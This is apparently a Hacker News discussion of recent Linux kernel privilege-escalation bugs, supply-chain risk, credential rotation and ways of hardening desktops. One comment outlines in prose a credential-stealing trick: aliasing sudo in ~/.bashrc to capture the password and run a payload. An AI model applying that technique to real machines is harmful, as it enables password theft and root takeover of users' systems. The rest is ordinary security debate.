If there is any learning from the AI craze, it is that there is no coming back on the pace of breach discoveries.

Sure we've just faced an acceleration phase and a wave of patches will follow before settling in. But where we used to find x zero-day per million LoC, we will now find 10x ZD/MLoC. [hopefully detection will become part of CI so that number may vary]

So, we will have more disasters waiting to happen. Assume that they will happen.

My #1 recommendation is to curate a list of the auth tokens that you use (keep the list, not the actual tokens in a central place...), and be ready to rotate them as automatically as possible. You already have backups. Know how to rotate all your credentials.

Write some scripts. Get ready. It will happen.

tdeck a day ago

> Copy Fail 2: Electric Boogaloo

What are people thinking with these meme style vulnerability names? It's going to be hard to pitch "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2: Electric Boogaloo".

  • dgellow a day ago

    "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2". Problem solved

q3k a day ago

You don't need a kernel LPE to root a Linux developer machine.

Just alias sudo to sudo-but-also-keep-password-and-execute-a-payload in ~/.bashrc and wait up to 24 hours. Maybe also simulate some breakage by intercepting other commands and force the user to run 'sudo systemctl' or something sooner rather than later.

  • himata4113 a day ago

    this, this is something I don't understand there are a billion ways to gain root once you control the user that regulary uses sudo.

    this is only scary for rootless containers as it skips an isolation layer, but we've started shipping distroless containers which are not vulnerable to this due to the fact that they lack priviledge escalation commands such as su or sudo.

    never trust software to begin with, sandbox everything you can and don't run it on your machine to begin with if possible.

    • BobbyTables2 a day ago

      I doubt your “distroless” container is any safer for this vulnerability .

      Infecting sudo just makes for a quick demo.

      If your container has different processes at different user ids, the exploit would still be effective.

      It would likely also be able to “modify” read only files mapped from the host.

      • himata4113 16 hours ago

        distroless rootless containers don't have the syscalls enabled to do anything reasonable with this exploit

    • 1718627440 a day ago

      First, if you control the account of the administrator, you already have a worst case scenario. Second, this is why distros tell you to not use sudo. The purpose of sudo is to give some people the ability to run a very specific program with elevated privileges that wouldn't be allowed otherwise, while you don't want them to have any other administrative rights. If you want someone to be an admin over the system, just give them the root password.

    • LeCompteSftware a day ago

      I agree that de facto the biggest security flaw in Linux is "okay I'm tired of getting interrupted all day assisting you, I know you're competent, I'll put you on the sudoers list."

      But there are a lot of academic and research institutions that actually do have good Linux user management. I worked at a pediatric hospital, and the RHEL HPC admins did not mess around in terms of who was allowed to access which patients' data. As someone who was not an admin, it was a huge pain and it should have been. So this bug has pretty serious implications, seems like anyone at that hospital can abscond with a lot of deidentified data. [research HPC not as sensitive as the clinical stuff, which I think was all Windows Server]

      • himata4113 a day ago

        I think we've concluded already that user isolation is not safe and shouldn't be trusted, that's why we've invested to hard into namespacing(containers). users should only have what they need if you really care about security and don't want to tolerate the overhead of virtualization based security.

    • TacticalCoder a day ago

      > this, this is something I don't understand there are a billion ways to gain root once you control the user that regulary uses sudo.

      I won't enter into all the details but... It's totally possible to not have the sudo command (or similar) on a system at all and to have su with the setuid bit off.

      On my main desktop there's no sudo command there are zero binaries with the setuid bit set.

      The only way to get root involves an "out-of-band" access, from another computer, that is not on the regular network [1].

      This setup as worked for me since years. And years. And I very rarely need to be root on my desktop. When I do, I just use my out-of-band connection (from a tiny laptop whose only purpose is to perform root operations on my desktop).

      For example today: I logged in as root blocked the three modules with the "dirty page" mitigation suggested by the person who reported the exploit.

      You're not faking sudo with a mocking-bird on my machine. You're not using "su" from a regular user account. No userns either (no "insmod", no nothing).

      Note that it's still possible to have several non-root users logged in as once: but from one user account, you cannot log in as another. You can however switch to TTY2, TTY3, etc. and log in as another user. And the whole XKCD about "get local account, get everything of importance", ain't valid either in my case.

      I'm not saying it's perfect but it's not as simple as "get a local shell, wait until user enters 'sudo', get root". No sudo, no su.

      It's brutally simple.

      And, the best of all, it's a fully usable desktop: I'm using such a setup since years (I've also got servers, including at home, with Proxmox and VMs etc., but that's another topic).

      • theamk a day ago

        Do you install system-wide software at all? How do you configure it?

        That's my main reason to use "sudo" on the desktop.

        I suppose I could install every piece of software locally, either from source or via flatpak, but this is a lot of work and much harder than doing it the easy way and using global install via my distro. Plus, non-distro installs are much more likely to be out of date and contain vulnerabilities of their own.

      • himata4113 a day ago

        nixos comes to mind, rootless runpod, qubesos.

        but they all have something in common, the issue is that your user is compromised that means the applications running in that user are compromised the only thing you gain is that you can trust your system, you can trust that your system is not compromised which is only relevant with infrastructure since if your user is compromised you're already fucked, multi-user setups with untrusted accounts are inheritly insecure and in infrastrucure the blast radius might be thousands of users that use the said service.

        the breakdown looks something like this:

          - you heavily compromise a single user <- exploit not relevant
          - you compromise a shared setup via a bad user to compromise a lot of users <- should never be used anymore, namespace isolation is the replacement
          - you somewhat compromise a lot of users via infra compromise <- where this hurts
      • FrinkleFrankle a day ago

        Would you mind sharing the relevant config?

      • q3k a day ago

        Yes, you are very special and smart. Good for you!

        Most people however aren't and will happily run sudo after an npm postinstall script tells them to apt-install turboencabulator for their new frontend framework to function.

        • 1718627440 a day ago

          You really can't protect against a malicious sysadmin. Let them be bitten, maybe they will be smarter next time.

  • cozzyd a day ago

    right, a bigger issue is multitenant systems, which are common in academia (I manage several such systems for various experiments). Now, we generally trust the users to not be malicious, but most don't get sudo, because physicists tend to think they know what they're doing when they don't really (except for me, of course).

    Something that concerns me more is I use things like gemini-cli or claude-cli via their own, non-sudo accounts with no ssh keys or anything on my laptop, but a LPE means they can find away around such restrictions if they feel like it (and they might).

  • Terr_ a day ago

    Perhaps, but it makes a huge difference if you're running the vulnerable code in a container or as a different user.

  • 1718627440 a day ago

    When you control the bashrc of some other person, it is already kind of game over.

marvinified a day ago

I've been doing alot of that lately

epolanski 11 hours ago

Is the current situation a positive for commercial Linux distros that focus on security?

leonidasrup a day ago

Maybe the new software should not have any errors. I know, I have higher expectations than the average commercial software customer.

  • Jean-Papoulos a day ago

    Of course, why didn't anyone think of that ? I bet if someone started to ship software that has no errors they'll make a huge amount of money, especially from all the people that are security-minded !

    Please grow a brain.

    • leonidasrup a day ago

      There is currently only method to prove absence of errors, this method is not LLMs, it's formal verification methods. Currently only very little formal verification is used in software industry, static type checking.

fsflover a day ago

Alternatively, consider using Qubes OS, which isolates untrusted software using strong hardware virtualization. My daily driver, can't recommend it enough. Examples of usage patterns: https://doc.qubes-os.org/en/r4.3/user/how-to-guides/how-to-o...

bsenftner a day ago

This is why I avoid the entire JavaScript shitshow that is NPM and all that ecosystems nonsense. The population of users do not have the secondary considerations to be trusted, there will always be someone that does the worse and talks too many into following them. Then the "best practices" produce failures. What a shit show.

bicepjai a day ago

I still can’t believe people are ok with software updates every day. Looking at you Claude code

  • sshine a day ago

    It's a two-edged sword. You're damned if you do and damned if you don't update.

jauntywundrkind a day ago

I do a bit wonder what happens as standard practice becomes to lag more and more and more. Who is there left that's looking, that'd finding out?

  • ayuhito a day ago

    I think there’s already a big market of supply chain security companies that are proactively scanning dependencies for this sort of thing.

    They’re always racing to be the first one to write an article about a case.

  • cybercatgurrl a day ago

    you raise a really good point. if everyone is doing this at exactly the same lag then it will eventually start hitting groups in sync at the exact same time

jbrooks84 a day ago

100% doing this, sadly

shevy-java 19 hours ago

> Outside of Linux kernel patches from your distro, I think it's probably a good idea to put a moratorium on installing new software for a week or so.

This makes no sense.

So, copy.fail refers to a linux kernel problem, yes? A local instructor showed it to us, e. g. by using python to become superuser.

Well ... does this mean that a computer system is useless, because of that bug? No. Besides, people can patch it already, so while that is indeed a huge bug as such, it does not mean it makes people's computer useless at all.

But, even ignoring this ... why would we now AVOID installing new software" for a bit? What rationale is given here? The rationale was given "because of ... uhm ... npm supply chain attacks":

"Right now would be one of the best times for a supply chain attack via NPM to hit hard.

Outside of Linux kernel patches from your distro, I think it's probably a good idea to put a moratorium on installing new software for a week or so."

Well, many computer systems won't even have npm installed. Besides, if they do, they should be well aware of npm having had issues for such a long time. left-pad is still the funniest one of all tims IMO, or among top three. copy.fail is not funny - it is almost so simple that it is stupid, which kind of makes this an epic fail indeed, and that AI found it also kind of means that skynet won. Humans won't find as many weaknesses as AI skynet will. But just because of such an exploit and npm sucking, why would this mean I should ... arbitrarily stop compiling any new software? THAT MAKES ABSOLUTELY NO SENSE AT ALL. That "rationale" is not a rationale. That is just an opinion, without any real argument to be had.

If the issue is serious, patch the linux kernel. End of story. No need to have a "moratorium" on installing new software. The "for a bit" makes no sense anymore than "for 50 days" or any other arbitrary number. xeiaso is not THINKING here.

rvz a day ago

If you are on Linux that is.

bitfilped a day ago

Am I missing part of the article? This seems like 2 sentences saying "don't install anything cause some Linux LPEs came out." I don't understand why this is on the frontpage of HN.

  • xena 14 hours ago

    As the author of it I'm as confused as you are. It's frontpage number 68 for me, next time is ultimate nice.

ptrl600 a day ago

What if it's a really good bit?

cookiengineer a day ago

Fun fact: You still can't build the vllm container with updated dependencies since llmlite got pwned. Either due to regression bugs, or due to impossible transient dependencies in the dependency tree that are not resolvable. There is just too much slopcode down the line, and too many dependencies relying on pinned outdated (and unpublished) dependencies.

I switched to llama.cpp because of that.

To me it feels more and more that the slopcode world is the opposite philosophy of reproducible builds. It's like the anti methodology of how to work in that regard.

Before, everyone was publishing breaking changes in subminor packages because nobody adhered to any API versioning system standards. Now it's every commit that can break things. That is not an improvement.

  • 2ndorderthought a day ago

    Write only code is such a bad bad idea. No one is reviewing 20k loc PRS with 15 new dependencies in an afternoon. Sorry it's just not happening I don't care how many years you have been a software engineer. Yet that's the new thing and how we all are supposed to work or else we are all Luddites.

    • perching_aix a day ago

      I'm personally waiting to be downgraded to simply being called "lazy".

      When I see pages of obviously generated prose being submitted as any kind of documentation, my eyes just glaze over. I feel so guilty sharing similar stuff too, though to my credit, at least I always lead with a self-written TLDR, the slop is just for reference. But it's so bad, like genuinely distressing tier. I don't want to read all that junk, and more and more gets produced.

      Prose type docs have always been my Achilles heel, and this is like the worst possible evolution of that.

      For a brief period in the past few weeks, they somehow managed to make a change to ChatGPT Thinking that made it succint. The tone was super fact oriented too. It was honestly like waking up from a fever dream.

  • cybercatgurrl a day ago

    slopcode is a pejorative that means nothing to me. if you have an actual criticism to make, then do it

grayhatter a day ago

I dislike FUD like this :/

Luker88 a day ago

Dammit, this is why nobody uses NixOS. Nothing works on it!

The copyFail didn't, the dirtyfrag doesn't.

This copfail2 does modify /etc/passwd, but I can't `su - sick` as expected.

/s

  • Luker88 a day ago

    sligtly unrelated, but the portable way to execute stuff is via `/usr/bin/env`, not `/bin/bash`.

    I did try fixing the path to use nixos paths, but it was still unsuccessful. Did not really check further.

foo12bar a day ago

Don't install anything, use an LLM to write everything from scratch. It may have bugs, but no one will know how to exploit them, especially when closed source.

Code is cheap and is becoming cheaper by the day. We need new paradigms.

  • Wilder7977 a day ago

    So no external libraries for anything? Billions of lines of code that duplicate the same thing n-times across an organization?

    And the benefit is the obscurity of "no one will know how to exploit them"?

    No, thanks.

    • foo12bar a day ago

      Code is becoming so cheap that all you need is a bunch of api's for hardware and your computer will build to that spec. And you can define it in natural language.

  • pocksuppet 6 hours ago

    A remote LLM? Then the LLM vendor is installing things on your machine.

  • Gigachad a day ago

    LLMs have been used to scan binary blobs for exploits already. What would be more effective is a system designed with multiple layers of security so any one exploit is largely useless.

    • foo12bar a day ago

      They would have to have access to and scan your individual binary. You'd have to describe how you can write a system with multiple layers of security generally for most problems, because I don't see that as being possible.

  • randyrand a day ago

    Next: the back doors are written by the LLM!

mistyvales a day ago

Fedora upgrades have usually been great, but I jumped the gun on Fedora 44. Sound completely dead with no Pipewire service available. ALSA not responding. Firefox dies immediately if I open a new tab or right click anywhere on the browser itself (inlcuding nightly builds). QEMU refuses to load. Maybe something got completely f'd in the upgrade process.. I never had an issue before having upgraded from Fedora 38 all the way to 43. I am too tired to investigate it all.

I know this is unrelated to the article, but related to the title.

  • dralley a day ago

    I have had none of those issues on Fedora 44, FWIW.

  • circularfoyers a day ago

    If this is still the same install that you've been using since 38, you might find a clean install resolves some issues (whether or not your upgrade got botched). Also helps me get rid of software I installed that I don't use anymore, which I feel is relevant to this article. But part of why I love Silverblue so much is I don't have to worry about upgrades getting botched and fwiw as well, I haven't noticed any of those bugs on 44 across several very different machines.

  • cevn a day ago

    I had a day 1 crashloop with KWin on the 2nd desktop, but on day 2 some package update fixed it. Honestly it isn't the first time Fedora upgrades have messed something up for me either but I do think it's more stable than the average Ubuntu release, not that I've upgraded ubuntu in like 5 yrs.

  • tokkkie a day ago

    Fedora 44 here, no issues.

Keyboard Shortcuts

j
Next item
k
Previous item
o / Enter
Open selected item
?
Show this help
Esc
Close modal / clear selection